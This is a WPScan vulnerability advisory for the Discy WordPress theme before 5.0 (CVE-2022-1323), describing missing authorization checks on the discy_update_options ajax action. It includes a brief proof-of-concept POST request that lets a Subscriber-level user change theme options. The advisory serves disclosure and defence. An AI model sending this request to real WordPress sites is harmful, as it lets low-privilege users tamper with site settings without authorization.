WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Discy < 5.0 - Subscriber+ Broken Access Control to change settings

Description

The theme lacks authorization checks then processing ajax requests to the discy_update_options action,  allowing any logged in users (with privileges as low as Subscriber,) to change the theme options by sending a crafted POST request.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Cookie: [subscriber+]

action=discy_update_options&data=<changed settings>

Affects Themes

discy
Fixed in version 5.0

References

CVE
CVE-2022-1323

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

Veshraj Ghimire

Submitter

Veshraj Ghimire

Submitter website
https://veshrajghimire.com.np
Submitter twitter
GhimireVeshraj
Verified

Yes

WPVDB ID
2d8020e1-6489-4555-9956-2dc190aaa61b

Timeline

Publicly Published

2022-07-12 (about 6 months ago)

Added

2022-07-12 (about 6 months ago)

Last Updated

2022-07-12 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin